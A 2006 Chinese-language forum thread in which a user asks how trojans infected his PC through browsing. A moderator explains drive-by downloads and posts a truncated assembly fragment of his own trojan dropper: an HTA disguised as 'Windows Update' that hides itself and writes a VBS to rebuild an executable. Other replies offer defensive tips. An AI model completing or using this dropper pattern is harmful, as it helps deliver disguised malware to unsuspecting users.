广告广告
  加入我的最爱 设为首页 风格修改
首页 首尾
 手机版   订阅   地图  繁体 
您是第 2930 个阅读者
 
发表文章 发表投票 回覆文章
  可列印版   加为IE收藏   收藏主题   上一主题 | 下一主题   
lens690 手机
个人头像
个人文章 个人相簿 个人日记 个人地图
初露锋芒
级别: 初露锋芒 该用户目前不上站
推文 x1 鲜花 x51
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片
推文 x0
[问题讨论] 问个问题,想知道这是啥原理?
最近在Google找资料,不小心点到简体网站进去,然后,IE就锁住无法使用...过一会,就觉得电脑怪怪的噜~

当下,立刻重新开机进入安全模式察看,果然,发现了多达7个木马进入电脑执行~

但,我的疑问是:要如何宰杀木马,这个我很熟,但,木马到底是怎进来的?这个真的无法防御吗?若不靠防毒程式、防火墙软体等等,真的就没有其他办法了吗?

因为,我察觉的档案,都是一堆exe档,以及一堆DLL档案,这些档案,并非我浏览网页时,按执行或同意,而进来的~

而是单纯只浏览就进来了,所以才有此问~

希望知道的大大能帮我解惑,感谢~



确保电脑安全,勿点选不明档案或网址
献花 x0 回到顶端 [楼 主] From:台湾中华电信 | Posted:2006-12-14 19:28 |
upside 手机 葫芦墩家族
个人头像
个人文章 个人相簿 个人日记 个人地图
特殊贡献奖 社区建设奖 优秀管理员勋章
头衔:反病毒 反诈骗 反虐犬   反病毒 反诈骗 反虐犬  
版主
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

大大没做功课唷 此问题我也研究很久
按照原理我也能写出一个小木马 但纯属研究而已
http://bbs-mychat.com/read.php?fid=254&tid=587899


爸爸 你一路好走
献花 x0 回到顶端 [1 楼] From:台湾 | Posted:2006-12-14 19:51 |
lens690 手机
个人头像
个人文章 个人相簿 个人日记 个人地图
初露锋芒
级别: 初露锋芒 该用户目前不上站
推文 x1 鲜花 x51
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

1.利用IE入侵,重点是IE没上HotFix...

但是我的IE HotFix全上,那还会透过IE入侵是啥原因呢?

另外,有没有办法阻挡?



确保电脑安全,勿点选不明档案或网址
献花 x0 回到顶端 [2 楼] From:台湾中华电信 | Posted:2006-12-14 20:35 |
upside 手机 葫芦墩家族
个人头像
个人文章 个人相簿 个人日记 个人地图
特殊贡献奖 社区建设奖 优秀管理员勋章
头衔:反病毒 反诈骗 反虐犬   反病毒 反诈骗 反虐犬  
版主
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

一般来说 我只要在该网页内 写入一些指令语法就能 背景跳出视窗并自动下载档案到你的电脑并且执行
这样就达到入侵的动作了
我分享一段 之前写的木马程序的一段 应该还能看的懂吧
其他程序的执行法就无发布出来了

按照现在的XP 系统安全性 几乎无法防止 因为漏洞实在太多
甚至可以仿照正常下载程序来发布木马 防毒与防火墙 不可能阻挡这些正常程序
否则会无法上网或下载 除了已知木马外约有70%-80% 几乎无法阻挡
这些也是我头痛的地方 明知道原理 可是找不出也写不出好程式 表情

szHTAFileName   equ   "xxx.exe"                                                                                                                                                                  
szHTAVbsName   equ   "xxx.vbs"                                                                                                                                                                    
                                                                                                                                                                                         
szHTACode1     db     '<HTML>',13,10                                                                                                                                                                
          db     '<HEAD>',13,10                                                                                                                                                                
          db     '<TITLE>Windows Update</TITLE>',13,10                                                                                                                                                
          db     '<HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/>',13,10
          db     '<SCRIPT LANGUAGE="VBScript">',13,10                                                                                                                                                  
          db     'MyFile = "',szHTAVbsName,'"',13,10                                                                                                                                                  
          db     'Set FSO = CreateObject("Scripting.FileSystemObject")',13,10                                                                                                                                  
          db     'Set TSO = FSO.CreateTextFile(MyFile, True)',13,10                                                                                                                                        
          db     'TSO.write "dim filesys, filetxt, getname, path, textfile, i" & vbcrlf',13,10                                                                                                                      
          db     'TSO.write "textfile = ""',szHTAFileName,'""" & vbcrlf',13,10                                                                                                                                
          db     'TSO.write "Set filesys = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf',13,10                                                                                                                
          db     'TSO.write "Set filetxt = filesys.CreateTextFile(textfile, True)" & vbcrlf',13,10                                                                                                                    
          db     'TSO.write "getname = filesys.GetFileName(path)" & vbcrlf',13,10                                                                                                                              
          db     'TSO.write "dim a" & vbcrlf',13,10                                                                                                                                                  
          db     'TSO.write "a=Array(',0                                                                                                                                                          


[ 此文章被upside在2006-12-14 21:26重新编辑 ]


爸爸 你一路好走
献花 x0 回到顶端 [3 楼] From:台湾 | Posted:2006-12-14 21:15 |
lens690 手机
个人头像
个人文章 个人相簿 个人日记 个人地图
初露锋芒
级别: 初露锋芒 该用户目前不上站
推文 x1 鲜花 x51
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

So...

恩~那...就遭了@@...



确保电脑安全,勿点选不明档案或网址
献花 x0 回到顶端 [4 楼] From:台湾中华电信 | Posted:2006-12-14 21:21 |
upside 手机 葫芦墩家族
个人头像
个人文章 个人相簿 个人日记 个人地图
特殊贡献奖 社区建设奖 优秀管理员勋章
头衔:反病毒 反诈骗 反虐犬   反病毒 反诈骗 反虐犬  
版主
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

下面是引用lens690于2006-12-14 21:21发表的 :
So...

恩~那...就遭了@@...
要防止 防毒.防木马大厂都做不到了 我们这种小角色 当然也无法了
我们只能自力救济 目前除了将 木马防弹衣 再改版加强外
还在想设计一套 万用木马杀毒程序
其实研究木马越多 发现其实原理都差不多 而且感染的地方也大同小异
只要定期执行一次 一些常见的木马 都能删除掉
其实一些扫除木马软体 也能做到 但是就某些木马 暂时无法移除 必须等待该病毒码更新后 才有可能
但是使用者却不能等 常常在各大网站看到一些求助的帖子
都是一些新木马.病毒 大厂的动作永远是慢半拍 木马.病毒的灾情已经泛滥了 才迟迟更新病毒码
甚至无解

但也看到一些朋友 提出不少的解决方案 有些有效有些无效
小弟的万用木马杀毒程序 也是参考其原理制作出来的
而且是开放的 有能力的朋友 可以随时加入以便更新使用
在网路上有看到不少朋友有写出类似的软体 但是都是以程式来使用
无法自行加入 必须等待他更新


爸爸 你一路好走
献花 x0 回到顶端 [5 楼] From:台湾 | Posted:2006-12-14 21:48 |
upside 手机 葫芦墩家族
个人头像
个人文章 个人相簿 个人日记 个人地图
特殊贡献奖 社区建设奖 优秀管理员勋章
头衔:反病毒 反诈骗 反虐犬   反病毒 反诈骗 反虐犬  
版主
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

刚找到一篇旧文章 虽然再用此法可能已经行不通了
但是原理是一样的 只要变一变 啥VISTA 防毒.防火墙 几乎没用了
http://bbs.mychat.to/read.php?fid=313&tid=211528


爸爸 你一路好走
献花 x0 回到顶端 [6 楼] From:台湾和信超媒体宽带网 | Posted:2006-12-15 20:01 |
k8g 手机
个人头像
个人文章 个人相簿 个人日记 个人地图
特殊贡献奖
初露锋芒
级别: 初露锋芒 该用户目前不上站
推文 x6 鲜花 x87
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

http://www.powershadow.c...o_faq.htm

如果用PowerShadow上网,那会不会安全点? 倒底有没有用
我也很好奇,虽然它号称百毒不侵? 表情有没有可能在影子模式
底下的入侵,还原后还在?


[ 此文章被k8g在2006-12-16 11:41重新编辑 ]


阿弥陀佛
献花 x0 回到顶端 [7 楼] From:未知地址 | Posted:2006-12-16 11:35 |
upside 手机 葫芦墩家族
个人头像
个人文章 个人相簿 个人日记 个人地图
特殊贡献奖 社区建设奖 优秀管理员勋章
头衔:反病毒 反诈骗 反虐犬   反病毒 反诈骗 反虐犬  
版主
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

老话一句 有招就有破 有破大家用

虽然目前好像不会中毒 主要是它是一个虚拟的系统
让木马.病毒 仅在该系统中运作 而不会影响到正常系统
一旦关闭或重新开机 就完全消失了

如果新型的病毒会去判断是否为虚拟系统还是正常系统
如果是虚拟的系统 会去走它的漏洞 进而影响到正常系统


爸爸 你一路好走
献花 x0 回到顶端 [8 楼] From:台湾 | Posted:2006-12-16 11:59 |
mylinux
个人头像
个人文章 个人相簿 个人日记 个人地图
小人物
级别: 小人物 该用户目前不上站
推文 x0 鲜花 x13
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

有段时间没摸 Windows 了,但以下方法应该可将伤害降到最低:

1. 关闭 ActiveX 或是启用时要通知。

2. 关闭 JavaScript,只开放一些知名的大站或熟悉的网站使用。

3. 使用可扫描 http port 的防毒软体。


献花 x0 回到顶端 [9 楼] From:欧洲 | Posted:2006-12-16 14:47 |

首页  发表文章 发表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.060145 second(s),query:16 Gzip disabled
本站由 瀛睿律师事务所 担任常年法律顾问 | 免责声明 | 本网站已依台湾网站内容分级规定处理 | 连络我们 | 访客留言